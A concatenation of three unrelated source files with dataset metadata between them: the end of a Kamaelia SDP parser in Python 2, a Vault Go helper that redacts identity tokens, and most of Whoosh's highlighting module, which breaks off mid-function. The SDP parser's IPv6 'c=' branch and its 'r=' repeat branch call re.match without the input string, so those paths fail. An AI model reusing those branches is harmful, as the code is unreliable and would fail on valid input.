'time' : [(2873397496L, 2873404696L, [])],
'URI' : 'http://www.example.com/seminars/sdp.pdf',
'email' : 'j.doe@example.com (Jane Doe)',
'attribute' : ['recvonly'],
'media':
[ { 'media' : ('audio', 49170, 1, 'RTP/AVP', '0'),
'connection': ('IN', 'IP4', '224.2.17.12', '127', 1)
},
{ 'media' : ('video', 51372, 1, 'RTP/AVP', '99'),
'connection': ('IN', 'IP4', '224.2.17.12', '127', 1),
'attribute' : ['rtpmap:99 h263-1998/90000']
}
],
}
Behaviour
---------
Send individual lines as strings to SDPParser's "inbox" inbox. SDPParser cannot
handle multiple lines in the same string.
When SDPParser receives a producerFinished() message on its "control" inbox, or
if it encounter another "v=" line then it knows it has reached the end of the
SDP data and will output the parsed data as a dictionary to its "outbox" outbox.
The SDP format does *not* contain any kind of marker to signify the end of a
session description - so SDPParser only deduces this by being told that the
producer/data source has finished, or if it encounters a "v=" line indicating
the start of another session description.
SDPParser can parse more than one session description, one after the other.
If the SDP data is malformed AssertionError, or other exceptions, may be raised.
SDPParser does not rigorously test for exact compliance - it just complains if
there are glaring problems, such as fields appearing in the wrong sections!
If a producerFinished or shutdownMicroprocess message is received on the
"control" inbox then, once any pending data at the "inbox" inbox has been
processed, this component will terminate. It will send the message on out of
its "signal" outbox.
Only if the message is a producerFinished message will it output the session
description is has been parsing. A shutdownMicroprocess message will not result
in it being output.
Format of parsed output
-----------------------
The result of parsing SDP data is a dictionary mapping descriptive names of
types to values:
====== ====================== ======================================================================
Session Description
------------------------------------------------------------------------------------------------------
Type Dictionary key Format of the value
====== ====================== ======================================================================
v "protocol_version" version_number
o "origin" ("user", session_id, session_version, "net_type", "addr_type", "addr")
s "sessionname" "session name"
t & r "time" (starttime, stoptime, [repeat,repeat, ...])
where repeat = (interval,duration,[offset,offset, ...])
a "attribute" "value of attribute"
b "bandwidth" (mode, bitspersecond)
i "information" "value"
e "email" "email-address"
u "URI" "uri"
p "phone" "phone-number"
c "connection" ("net_type", "addr_type", "addr", ttl, groupsize)
z "timezone adjustments" [(adj-time,offset), (adj-time,offset), ...]
k "encryption" ("method","value")
m "media" [media-description, media-description, ... ]
see next table for media description structure
====== ====================== ======================================================================
Note that 't' and 'r' lines are combined in the dictionary into a single
"time" key containing both the start and end times specified in the 't' line
and a list of any repeats specified in any 'r' lines present.
The "media" key contains a list of media descriptions. Like for the overall
session description, each is parsed into a dictionary, that will contain some
or all of the following:
====== ====================== ======================================================================
Media Descriptions
------------------------------------------------------------------------------------------------------
Type Dictionary key Format of the value
====== ====================== ======================================================================
m "media" ("media-type", port-number, number-of-ports, "protocol", "format")
c "connection" ("net_type", "addr_type", "addr", ttl, groupsize)
b "bandwidth" (mode, bitspersecond)
i "information" "value"
k "encryption" ("method","value")
a "attribute" "value of attribute"
====== ====================== ======================================================================
Some lines are optional in SDP. If they are not included, then the parsed output
will not contain the corresponding key.
The formats of values are left unchanged by the parsing. For example, integers
representing times are simply converted to integers, but the units used remain
unchanged (ie. they will not be converted to unix time units).
"""
# Basic Parser for SDP data, as defined in RFC 4566
#
# assuming the data is already split into lines
#
# ignores attribute lines to simplify parsing
from Axon.Component import component
from Axon.Ipc import producerFinished,shutdownMicroprocess
import re
class AllDone(Exception):
pass
class ShutdownNow(Exception):
pass
class SDPParser(component):
"""\
SDPParser() -> new SDPParser component.
Parses Session Description Protocol data (see RFC 4566) sent to its "inbox"
inbox as individual strings for each line of the SDP data. Outputs a dict
containing the parsed data from its "outbox" outbox.
"""
Inboxes = { "inbox" : "SDP data in strings, each containing a single line",
"control" : "Shutdown signalling",
}
Outboxes = { "outbox" : "Parsed SDP data in a dictionary",
"signal" : "Shutdown signalling",
}
def handleControl(self):
while self.dataReady("control"):
msg = self.recv("control")
if isinstance(msg,producerFinished):
self.shutdownMsg = msg
raise AllDone
elif isinstance(msg,shutdownMicroprocess):
self.shutdownMsg = msg
raise ShutdownNow
else:
self.send(msg,"signal")
def readline(self):
while 1:
if self.dataReady("inbox"):
line = self.recv("inbox")
if line != "":
yield line
return
self.handleControl()
self.pause()
yield None
def main(self):
self.shutdownMsg = None
session = {}
mandatory = "XXX"
try:
for line in self.readline(): yield 1
# self.readline() generator complete ... line now contains a line with something on it
type,key,value = _parseline(line)
while 1:
# begin by parsing the session section
session = {}
mandatory = "vost"
multiple_allowed = "abtr"
single_allowed = "vosiuepcbzk"
most_recent_t = None
while type != "m":
# check to see if we've been getting SDP data, then another 'v' has come along
# signifying the start of a new one
if type=="v" and "v" not in mandatory:
break
mandatory=mandatory.replace(type,"")
assert((type in single_allowed) or (type in multiple_allowed))
single_allowed=single_allowed.replace(type,"")
if type in multiple_allowed:
if type=="r":
assert(most_recent_t is not None)
most_recent_t[2].append(value) # tag repeats into list on end of time field
else:
session[key] = session.get(key,[])
session[key].append(value)
else:
session[key] = value
for line in self.readline(): yield 1
# self.readline() generator complete ... line now contains a line with something on it
type,key,value = _parseline(line)
# we've hit an 'm' so its the end of the session section
assert(mandatory=="")
# now move onto media sections
mandatory_additional=""
if "c" in single_allowed:
mandatory_additional+="c"
session['media'] = []
# do a media section
while type=="m":
mandatory = "" + mandatory_additional
multiple_allowed = "a"
single_allowed = "icbk"
media={key:value}
session['media'].append(media)
for line in self.readline(): yield 1
# self.readline() generator complete ... line now contains a line with something on it
type,key,value = _parseline(line)
while type != "m" and type != "v":
mandatory=mandatory.replace(type,"")
assert((type in single_allowed) or (type in multiple_allowed))
single_allowed=single_allowed.replace(type,"")
if type in multiple_allowed:
media[key] = media.get(key,[])
media[key].append(value)
else:
media[key] = value
for line in self.readline(): yield 1
# self.readline() generator complete ... line now contains a line with something on it
type,key,value = _parseline(line)
# end of media section
assert(mandatory=="")
# end of complete SDP file (we've hit another 'v' signifying the start of a new one)
self.sendOutParsedSDP(session)
except AllDone:
if mandatory=="":
self.sendOutParsedSDP(session)
yield 1
except ShutdownNow:
pass
if self.shutdownMsg is None:
self.shutdownMsg = producerFinished()
self.send(self.shutdownMsg,"signal")
def sendOutParsedSDP(self,session):
# normalise it a bit first
if "connection" in session:
for media in session['media']:
media['connection'] = session['connection']
self.send(session,"outbox")
def _parseline(line):
match = re.match("^(.)=(.*)",line)
type,value = match.group(1), match.group(2)
if type=="v":
assert(value=="0")
return type, 'protocol_version', int(value)
elif type=="o":
user,sid,ver,ntype,atype,addr = re.match("^ *(\S+) +(\d+) +(\d+) +(IN) +(IP[46]) +(.+)",value).groups()
return type, 'origin', (user,int(sid),int(ver),ntype,atype,addr)
elif type=="s":
return type, 'sessionname', value
elif type=="i":
return type, 'information', value
elif type=="u":
return type, 'URI', value
elif type=="e":
return type, 'email', value
elif type=="p":
return type, 'phone', value
elif type=="c":
if re.match("^ *IN +IP4 +.*$",value):
match = re.match("^ *IN +IP4 +([^/]+)(?:/(\d+)(?:/(\d+))?)? *$",value)
ntype,atype = "IN","IP4"
addr,ttl,groupsize = match.groups()
if ttl is None:
ttl=127
if groupsize is None:
groupsize=1
elif re.match("^ *IN +IP6 +.*$",value):
match = re.match("^ *IN +IP6 +([abcdefABCDEF0123456789:.]+)(?:/(\d+))? *$")
ntype,atype = "IN","IP6"
addr,groupsize = match.groups()
else:
assert(False)
return type, 'connection', (ntype,atype,addr,ttl,groupsize)
elif type=="b":
mode,rate = \
re.match("^ *((?:AS)|(?:CT)|(?:X-[^:]+)):(\d+) *$",value).groups()
bitspersecond=long(rate)*1000
return type, 'bandwidth', (mode,bitspersecond)
elif type=="t":
start,stop = [ long(x) for x in re.match("^ *(\d+) +(\d+) *$",value).groups() ]
repeats = []
return type, 'time', (start,stop,repeats)
elif type=="r":
terms=re.split("\s+",value)
parsedterms = []
for term in terms:
value, unit = re.match("^\d+([dhms])?$").groups()
value = long(value) * {None:1, "s":1, "m":60, "h":3600, "d":86400}[unit]
parsedterms.append(value)
interval,duration=parsedterms[0], parsedterms[1]
offsets=parsedterms[2:]
return type, 'repeats', (interval,duration,offsets)
elif type=="z":
adjustments=[]
while value.strip() != "":
adjtime,offset,offsetunit,value = re.match("^ *(\d+) +([+-]?\d+)([dhms])? *?(.*)$",value).groups()
adjtime=long(adjtime)
offset=long(offset) * {None:1, "s":1, "m":60, "h":3600, "d":86400}[offsetunit]
adjustments.append((adjtime,offset))
return type, 'timezone adjustments', adjustments
elif type=="k":
method,value = re.match("^(clear|base64|uri|prompt)(?:[:](.*))?$",value).groups()
return type, "encryption", (method,value)
elif type=="a":
return type, 'attribute', value
elif type=="m":
media, port, numports, protocol, fmt = re.match("^(audio|video|text|application|message) +(\d+)(?:[/](\d+))? +([^ ]+) +(.+)$",value).groups()
port=int(port)
if numports is None:
numports=1
else:
numports=int(numports)
return type, 'media', (media,port,numports,protocol,fmt)
else:
return type, 'unknown', value
__kamaelia_components__ = ( SDPParser, )
if __name__ == "__main__":
from Kamaelia.Util.DataSource import DataSource
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Util.Console import ConsoleEchoer
sdp = """\
v=0
o=jdoe 2890844526 2890842807 IN IP4 10.47.16.5
s=SDP Seminar
i=A Seminar on the session description protocol
u=http://www.example.com/seminars/sdp.pdf
e=j.doe@example.com (Jane Doe)
c=IN IP4 224.2.17.12/127
t=2873397496 2873404696
a=recvonly
m=audio 49170 RTP/AVP 0
m=video 51372 RTP/AVP 99
a=rtpmap:99 h263-1998/90000
v=0
o=bfcrd 1140190501 1140190501 IN IP4 132.185.224.80
s=BFC ONE [H.264/AVC]
i=Multicast trial service from the BBC! Get BFC FLURBLE here!
a=x-qt-text-nam:BFC FLURBLE [H.264/AVC]
a=x-qt-text-aut:BFC Research & Development
a=x-qt-text-cpy:Copyright (c) 2006 British Flurbling Corporation
u=http://www.bbc.co.uk/multicast/
e=Multicast Support <multicast-tech@bfc.co.uk>
t=0 0
c=IN IP4 233.122.227.151/32
m=video 5150 RTP/AVP 33
b=AS:1200000
a=type:broadcast
a=mux:m2t
v=0
""".splitlines()
Pipeline( DataSource(sdp),
SDPParser(),
ConsoleEchoer(),
).run()
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright IBM Corp. 2016, 2025
// SPDX-License-Identifier: MPL-2.0
package pluginutil
import (
"time"
)
const redactedTokenString = "ey***"
type IdentityTokenRequest struct {
// Audience identifies the recipient of the token. The requested
// value will be in the "aud" claim. Required.
Audience string
// TTL is the requested duration that the token will be valid for.
// Optional with a default of 1hr.
TTL time.Duration
}
type IdentityTokenResponse struct {
// Token is the plugin identity token.
Token IdentityToken
// TTL is the duration that the token is valid for after truncation is applied.
// The TTL may be truncated depending on the lifecycle of its signing key.
TTL time.Duration
}
type IdentityToken string
// String returns a redacted token string. Use the Token() method
// to obtain the non-redacted token contents.
func (t IdentityToken) String() string {
return redactedTokenString
}
// Token returns the non-redacted token contents.
func (t IdentityToken) Token() string {
return string(t)
}
|
go
|
github
|
https://github.com/hashicorp/vault
|
sdk/helper/pluginutil/identity_token.go
|
# Copyright 2008 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
"""The highlight module contains classes and functions for displaying short
excerpts from hit documents in the search results you present to the user, with
query terms highlighted.
The highlighting system has four main elements.
* **Fragmenters** chop up the original text into __fragments__, based on the
locations of matched terms in the text.
* **Scorers** assign a score to each fragment, allowing the system to rank the
best fragments by whatever criterion.
* **Order functions** control in what order the top-scoring fragments are
presented to the user. For example, you can show the fragments in the order
they appear in the document (FIRST) or show higher-scoring fragments first
(SCORE)
* **Formatters** turn the fragment objects into human-readable output, such as
an HTML string.
See :doc:`/highlight` for more information.
"""
from __future__ import division
from collections import deque
from heapq import nlargest
from itertools import groupby
from whoosh.compat import htmlescape
from whoosh.analysis import Token
# The default value for the maximum chars to examine when fragmenting
DEFAULT_CHARLIMIT = 2 ** 15
# Fragment object
def mkfrag(text, tokens, startchar=None, endchar=None,
charsbefore=0, charsafter=0):
"""Returns a :class:`Fragment` object based on the :class:`analysis.Token`
objects in ``tokens`.
"""
if startchar is None:
startchar = tokens[0].startchar if tokens else 0
if endchar is None:
endchar = tokens[-1].endchar if tokens else len(text)
startchar = max(0, startchar - charsbefore)
endchar = min(len(text), endchar + charsafter)
return Fragment(text, tokens, startchar, endchar)
class Fragment(object):
"""Represents a fragment (extract) from a hit document. This object is
mainly used to keep track of the start and end points of the fragment and
the "matched" character ranges inside; it does not contain the text of the
fragment or do much else.
The useful attributes are:
``Fragment.text``
The entire original text from which this fragment is taken.
``Fragment.matches``
An ordered list of objects representing the matched terms in the
fragment. These objects have ``startchar`` and ``endchar`` attributes.
``Fragment.startchar``
The index of the first character in the fragment.
``Fragment.endchar``
The index of the last character in the fragment.
``Fragment.matched_terms``
A ``set`` of the ``text`` of the matched terms in the fragment (if
available).
"""
def __init__(self, text, matches, startchar=0, endchar= -1):
"""
:param text: the source text of the fragment.
:param matches: a list of objects which have ``startchar`` and
``endchar`` attributes, and optionally a ``text`` attribute.
:param startchar: the index into ``text`` at which the fragment starts.
The default is 0.
:param endchar: the index into ``text`` at which the fragment ends.
The default is -1, which is interpreted as the length of ``text``.
"""
self.text = text
self.matches = matches
if endchar == -1:
endchar = len(text)
self.startchar = startchar
self.endchar = endchar
self.matched_terms = set()
for t in matches:
if hasattr(t, "text"):
self.matched_terms.add(t.text)
def __repr__(self):
return "<Fragment %d:%d %d>" % (self.startchar, self.endchar,
len(self.matches))
def __len__(self):
return self.endchar - self.startchar
def overlaps(self, fragment):
sc = self.startchar
ec = self.endchar
fsc = fragment.startchar
fec = fragment.endchar
return (sc < fsc < ec) or (sc < fec < ec)
def overlapped_length(self, fragment):
sc = self.startchar
ec = self.endchar
fsc = fragment.startchar
fec = fragment.endchar
return max(ec, fec) - min(sc, fsc)
def __lt__(self, other):
return id(self) < id(other)
# Tokenizing
def set_matched_filter(tokens, termset):
for t in tokens:
t.matched = t.text in termset
yield t
# Fragmenters
class Fragmenter(object):
def must_retokenize(self):
"""Returns True if this fragmenter requires retokenized text.
If this method returns True, the fragmenter's ``fragment_tokens``
method will be called with an iterator of ALL tokens from the text,
with the tokens for matched terms having the ``matched`` attribute set
to True.
If this method returns False, the fragmenter's ``fragment_matches``
method will be called with a LIST of matching tokens.
"""
return True
def fragment_tokens(self, text, all_tokens):
"""Yields :class:`Fragment` objects based on the tokenized text.
:param text: the string being highlighted.
:param all_tokens: an iterator of :class:`analysis.Token`
objects from the string.
"""
raise NotImplementedError
def fragment_matches(self, text, matched_tokens):
"""Yields :class:`Fragment` objects based on the text and the matched
terms.
:param text: the string being highlighted.
:param matched_tokens: a list of :class:`analysis.Token` objects
representing the term matches in the string.
"""
raise NotImplementedError
class WholeFragmenter(Fragmenter):
"""Doesn't fragment the token stream. This object just returns the entire
entire stream as one "fragment". This is useful if you want to highlight
the entire text.
Note that even if you use the `WholeFragmenter`, the highlight code will
return no fragment if no terms matched in the given field. To return the
whole fragment even in that case, call `highlights()` with `minscore=0`::
# Query where no terms match in the "text" field
q = query.Term("tag", "new")
r = mysearcher.search(q)
r.fragmenter = highlight.WholeFragmenter()
r.formatter = highlight.UppercaseFormatter()
# Since no terms in the "text" field matched, we get no fragments back
assert r[0].highlights("text") == ""
# If we lower the minimum score to 0, we get a fragment even though it
# has no matching terms
assert r[0].highlights("text", minscore=0) == "This is the text field."
"""
def __init__(self, charlimit=DEFAULT_CHARLIMIT):
self.charlimit = charlimit
def fragment_tokens(self, text, tokens):
charlimit = self.charlimit
matches = []
for t in tokens:
if charlimit and t.endchar > charlimit:
break
if t.matched:
matches.append(t.copy())
return [Fragment(text, matches)]
# Backwards compatiblity
NullFragmeter = WholeFragmenter
class SentenceFragmenter(Fragmenter):
"""Breaks the text up on sentence end punctuation characters
(".", "!", or "?"). This object works by looking in the original text for a
sentence end as the next character after each token's 'endchar'.
When highlighting with this fragmenter, you should use an analyzer that
does NOT remove stop words, for example::
sa = StandardAnalyzer(stoplist=None)
"""
def __init__(self, maxchars=200, sentencechars=".!?",
charlimit=DEFAULT_CHARLIMIT):
"""
:param maxchars: The maximum number of characters allowed in a
fragment.
"""
self.maxchars = maxchars
self.sentencechars = frozenset(sentencechars)
self.charlimit = charlimit
def fragment_tokens(self, text, tokens):
maxchars = self.maxchars
sentencechars = self.sentencechars
charlimit = self.charlimit
textlen = len(text)
# startchar of first token in the current sentence
first = None
# Buffer for matched tokens in the current sentence
tks = []
endchar = None
# Number of chars in the current sentence
currentlen = 0
for t in tokens:
startchar = t.startchar
endchar = t.endchar
if charlimit and endchar > charlimit:
break
if first is None:
# Remember the startchar of the first token in a sentence
first = startchar
currentlen = 0
tlength = endchar - startchar
currentlen += tlength
if t.matched:
tks.append(t.copy())
# If the character after the current token is end-of-sentence
# punctuation, finish the sentence and reset
if endchar < textlen and text[endchar] in sentencechars:
# Don't break for two periods in a row (e.g. ignore "...")
if endchar + 1 < textlen and text[endchar + 1] in sentencechars:
continue
# If the sentence had matches and it's not too long, yield it
# as a token
if tks and currentlen <= maxchars:
yield mkfrag(text, tks, startchar=first, endchar=endchar)
# Reset the counts
tks = []
first = None
currentlen = 0
# If we get to the end of the text and there's still a sentence
# in the buffer, yield it
if tks:
yield mkfrag(text, tks, startchar=first, endchar=endchar)
class ContextFragmenter(Fragmenter):
"""Looks for matched terms and aggregates them with their surrounding
context.
"""
def __init__(self, maxchars=200, surround=20, charlimit=DEFAULT_CHARLIMIT):
"""
:param maxchars: The maximum number of characters allowed in a
fragment.
:param surround: The number of extra characters of context to add both
before the first matched term and after the last matched term.
"""
self.maxchars = maxchars
self.surround = surround
self.charlimit = charlimit
def fragment_tokens(self, text, tokens):
maxchars = self.maxchars
surround = self.surround
charlimit = self.charlimit
# startchar of the first token in the fragment
first = None
# Stack of startchars
firsts = deque()
# Each time we see a matched token, we reset the countdown to finishing
# the fragment. This also indicates whether we're currently inside a
# fragment (< 0 not in fragment, >= 0 in fragment)
countdown = -1
# Tokens in current fragment
tks = []
endchar = None
# Number of chars in the current fragment
currentlen = 0
for t in tokens:
startchar = t.startchar
endchar = t.endchar
tlength = endchar - startchar
if charlimit and endchar > charlimit:
break
if countdown < 0 and not t.matched:
# We're not in a fragment currently, so just maintain the
# "charsbefore" buffer
firsts.append(startchar)
while firsts and endchar - firsts[0] > surround:
firsts.popleft()
elif currentlen + tlength > maxchars:
# We're in a fragment, but adding this token would put us past
# the maximum size. Zero the countdown so the code below will
# cause the fragment to be emitted
countdown = 0
elif t.matched:
# Start/restart the countdown
countdown = surround
# Remember the first char of this fragment
if first is None:
if firsts:
first = firsts[0]
else:
first = startchar
# Add on unused front context
countdown += surround
tks.append(t.copy())
# If we're in a fragment...
if countdown >= 0:
# Update the counts
currentlen += tlength
countdown -= tlength
# If the countdown is expired
if countdown <= 0:
# Finish the fragment
yield mkfrag(text, tks, startchar=first, endchar=endchar)
# Reset the counts
tks = []
firsts = deque()
first = None
currentlen = 0
# If there's a fragment left over at the end, yield it
if tks:
yield mkfrag(text, tks, startchar=first, endchar=endchar)
class PinpointFragmenter(Fragmenter):
"""This is a NON-RETOKENIZING fragmenter. It builds fragments from the
positions of the matched terms.
"""
def __init__(self, maxchars=200, surround=20, autotrim=False,
charlimit=DEFAULT_CHARLIMIT):
"""
:param maxchars: The maximum number of characters allowed in a
fragment.
:param surround: The number of extra characters of context to add both
before the first matched term and after the last matched term.
:param autotrim: automatically trims text before the first space and
after the last space in the fragments, to try to avoid truncated
words at the start and end. For short fragments or fragments with
long runs between spaces this may give strange results.
"""
self.maxchars = maxchars
self.surround = surround
self.autotrim = autotrim
self.charlimit = charlimit
def must_retokenize(self):
return False
def fragment_tokens(self, text, tokens):
matched = [t for t in tokens if t.matched]
return self.fragment_matches(text, matched)
@staticmethod
def _autotrim(fragment):
text = fragment.text
startchar = fragment.startchar
endchar = fragment.endchar
firstspace = text.find(" ", startchar, endchar)
if firstspace > 0:
startchar = firstspace + 1
lastspace = text.rfind(" ", startchar, endchar)
if lastspace > 0:
endchar = lastspace
if fragment.matches:
startchar = min(startchar, fragment.matches[0].startchar)
endchar = max(endchar, fragment.matches[-1].endchar)
fragment.startchar = startchar
fragment.endchar = endchar
def fragment_matches(self, text, tokens):
maxchars = self.maxchars
surround = self.surround
autotrim = self.autotrim
charlimit = self.charlimit
j = -1
for i, t in enumerate(tokens):
if j >= i:
continue
j = i
left = t.startchar
right = t.endchar
if charlimit and right > charlimit:
break
currentlen = right - left
while j < len(tokens) - 1 and currentlen < maxchars:
next = tokens[j + 1]
ec = next.endchar
if ec - right <= surround and ec - left <= maxchars:
j += 1
right = ec
currentlen += (ec - next.startchar)
else:
break
left = max(0, left - surround)
right = min(len(text), right + surround)
fragment = Fragment(text, tokens[i:j + 1], left, right)
if autotrim:
self._autotrim(fragment)
yield fragment
# Fragment scorers
class FragmentScorer(object):
pass
class BasicFragmentScorer(FragmentScorer):
def __call__(self, f):
# Add up the boosts for the matched terms in this passage
score = sum(t.boost for t in f.matches)
# Favor diversity: multiply score by the number of separate
# terms matched
score *= (len(f.matched_terms) * 100) or 1
return score
# Fragment sorters
def SCORE(fragment):
"Sorts higher scored passages first."
return 1
def FIRST(fragment):
"Sorts passages from earlier in the document first."
return fragment.startchar
def LONGER(fragment):
"Sorts longer passages first."
return 0 - len(fragment)
def SHORTER(fragment):
"Sort shorter passages first."
return len(fragment)
# Formatters
def get_text(original, token, replace):
"""Convenience function for getting the text to use for a match when
formatting.
If ``replace`` is False, returns the part of ``original`` between
``token.startchar`` and ``token.endchar``. If ``replace`` is True, returns
``token.text``.
"""
if replace:
return token.text
else:
return original[token.startchar:token.endchar]
class Formatter(object):
"""Base class for formatters.
For highlighters that return strings, it is usually only necessary to
override :meth:`Formatter.format_token`.
Use the :func:`get_text` function as a convenience to get the token text::
class MyFormatter(Formatter):
def format_token(text, token, replace=False):
ttext = get_text(text, token, replace)
return "[%s]" % ttext
"""
between = "..."
def _text(self, text):
return text
def format_token(self, text, token, replace=False):
"""Returns a formatted version of the given "token" object, which
should have at least ``startchar`` and ``endchar`` attributes, and
a ``text`` attribute if ``replace`` is True.
:param text: the original fragment text being highlighted.
:param token: an object having ``startchar`` and ``endchar`` attributes
and optionally a ``text`` attribute (if ``replace`` is True).
:param replace: if True, the original text between the token's
``startchar`` and ``endchar`` indices will be replaced with the
value of the token's ``text`` attribute.
"""
raise NotImplementedError
def format_fragment(self, fragment, replace=False):
"""Returns a formatted version of the given text, using the "token"
objects in the given :class:`Fragment`.
:param fragment: a :class:`Fragment` object representing a list of
matches in the text.
:param replace: if True, the original text corresponding to each
match will be replaced with the value of the token object's
``text`` attribute.
"""
output = []
index = fragment.startchar
text = fragment.text
for t in fragment.matches:
if t.startchar is None:
continue
if t.startchar < index:
continue
if t.startchar > index:
output.append(self._text(text[index:t.startchar]))
output.append(self.format_token(text, t, replace))
index = t.endchar
output.append(self._text(text[index:fragment.endchar]))
out_string = "".join(output)
return out_string
def format(self, fragments, replace=False):
"""Returns a formatted version of the given text, using a list of
:class:`Fragment` objects.
"""
formatted = [self.format_fragment(f, replace=replace)
for f in fragments]
return self.between.join(formatted)
def __call__(self, text, fragments):
# For backwards compatibility
return self.format(fragments)
class NullFormatter(Formatter):
"""Formatter that does not modify the string.
"""
def format_token(self, text, token, replace=False):
return get_text(text, token, replace)
class UppercaseFormatter(Formatter):
"""Returns a string in which the matched terms are in UPPERCASE.
"""
def __init__(self, between="..."):
"""
:param between: the text to add between fragments.
"""
self.between = between
def format_token(self, text, token, replace=False):
ttxt = get_text(text, token, replace)
return ttxt.upper()
class HtmlFormatter(Formatter):
"""Returns a string containing HTML formatting around the matched terms.
This formatter wraps matched terms in an HTML element with two class names.
The first class name (set with the constructor argument ``classname``) is
the same for each match. The second class name (set with the constructor
argument ``termclass`` is different depending on which term matched. This
allows you to give different formatting (for example, different background
colors) to the different terms in the excerpt.
>>> hf = HtmlFormatter(tagname="span", classname="match", termclass="term")
>>> hf(mytext, myfragments)
"The <span class="match term0">template</span> <span class="match term1">geometry</span> is..."
This object maintains a dictionary mapping terms to HTML class names (e.g.
``term0`` and ``term1`` above), so that multiple excerpts will use the same
class for the same term. If you want to re-use the same HtmlFormatter
object with different searches, you should call HtmlFormatter.clear()
between searches to clear the mapping.
"""
template = '<%(tag)s class=%(q)s%(cls)s%(tn)s%(q)s>%(t)s</%(tag)s>'
def __init__(self, tagname="strong", between="...",
classname="match", termclass="term", maxclasses=5,
attrquote='"'):
"""
:param tagname: the tag to wrap around matching terms.
:param between: the text to add between fragments.
:param classname: the class name to add to the elements wrapped around
matching terms.
:param termclass: the class name prefix for the second class which is
different for each matched term.
:param maxclasses: the maximum number of term classes to produce. This
limits the number of classes you have to define in CSS by recycling
term class names. For example, if you set maxclasses to 3 and have
5 terms, the 5 terms will use the CSS classes ``term0``, ``term1``,
``term2``, ``term0``, ``term1``.
"""
self.between = between
self.tagname = tagname
self.classname = classname
self.termclass = termclass
self.attrquote = attrquote
self.maxclasses = maxclasses
self.seen = {}
self.htmlclass = " ".join((self.classname, self.termclass))
def _text(self, text):
return htmlescape(text, quote=False)
def format_token(self, text, token, replace=False):
seen = self.seen
ttext = self._text(get_text(text, token, replace))
if ttext in seen:
termnum = seen[ttext]
else:
termnum = len(seen) % self.maxclasses
seen[ttext] = termnum
return self.template % {"tag": self.tagname, "q": self.attrquote,
"cls": self.htmlclass, "t": ttext,
"tn": termnum}
def clean(self):
"""Clears the dictionary mapping terms to HTML classnames.
"""
self.seen = {}
class GenshiFormatter(Formatter):
"""Returns a Genshi event stream containing HTML formatting around the
matched terms.
"""
def __init__(self, qname="strong", between="..."):
"""
:param qname: the QName for the tag to wrap around matched terms.
:param between: the text to add between fragments.
"""
self.qname = qname
self.between = between
from genshi.core import START, END, TEXT # @UnresolvedImport
from genshi.core import Attrs, Stream # @UnresolvedImport
self.START, self.END, self.TEXT = START, END, TEXT
self.Attrs, self.Stream = Attrs, Stream
def _add_text(self, text, output):
if output and output[-1][0] == self.TEXT:
output[-1] = (self.TEXT, output[-1][1] + text, output[-1][2])
else:
output.append((self.TEXT, text, (None, -1, -1)))
def format_token(self, text, token, replace=False):
qn = self.qname
txt = get_text(text, token, replace)
return self.Stream([(self.START, (qn, self.Attrs()), (None, -1, -1)),
(self.TEXT, txt, (None, -1, -1)),
(self.END, qn, (None, -1, -1))])
def format_fragment(self, fragment, replace=False):
output = []
index = fragment.startchar
text = fragment.text
for t in fragment.matches:
if t.startchar > index:
self._add_text(text[index:t.startchar], output)
output.append((text, t, replace))
index = t.endchar
if index < len(text):
self._add_text(text[index:], output)
return self.Stream(output)
def format(self, fragments, replace=False):
output = []
first = True
for fragment in fragments:
if not first:
self._add_text(self.between, output)
output += self.format_fragment(fragment, replace=replace)
first = False
return self.Stream(output)
# Highlighting
def top_fragments(fragments, count, scorer, order, minscore=1):
scored_fragments = ((scorer(f), f) for f in fragments)
scored_fragments = nlargest(count, scored_fragments)
best_fragments = [sf for score, sf in scored_fragments if score >= minscore]
best_fragments.sort(key=order)
return best_fragments
def highlight(text, terms, analyzer, fragmenter, formatter, top=3,
scorer=None, minscore=1, order=FIRST, mode="query"):
if scorer is None:
scorer = BasicFragmentScorer()
if type(fragmenter) is type:
fragmenter = fragmenter()
if type(formatter) is type:
formatter = formatter()
if type(scorer) is type:
scorer = scorer()
if scorer is None:
scorer = BasicFragmentScorer()
termset = frozenset(terms)
tokens = analyzer(text, chars=True, mode=mode, removestops=False)
tokens = set_matched_filter(tokens, termset)
fragments = fragmenter.fragment_tokens(text, tokens)
fragments = top_fragments(fragments, top, scorer, order, minscore)
return formatter(text, fragments)
class Highlighter(object):
def __init__(self, fragmenter=None, scorer=None, formatter=None,
always_retokenize=False, order=FIRST):
self.fragmenter = fragmenter or ContextFragmenter()
self.scorer = scorer or BasicFragmentScorer()
self.formatter = formatter or HtmlFormatter(tagname="b")
self.order = order
self.always_retokenize = always_retokenize
def can_load_chars(self, results, fieldname):
# Is it possible to build a mapping between the matched terms/docs and
# their start and end chars for "pinpoint" highlighting (ie not require
# re-tokenizing text)?
if self.always_retokenize:
# No, we've been configured to always retokenize some text
return False
if not results.has_matched_terms():
# No, we don't know what the matched terms are yet
return False
if self.fragmenter.must_retokenize():
# No, the configured fragmenter doesn't support it
return False
# Maybe, if the field was configured to store characters
field = results.searcher.schema[fieldname]
return field.supports("characters")
@staticmethod
def _load_chars(results, fieldname, texts, to_bytes):
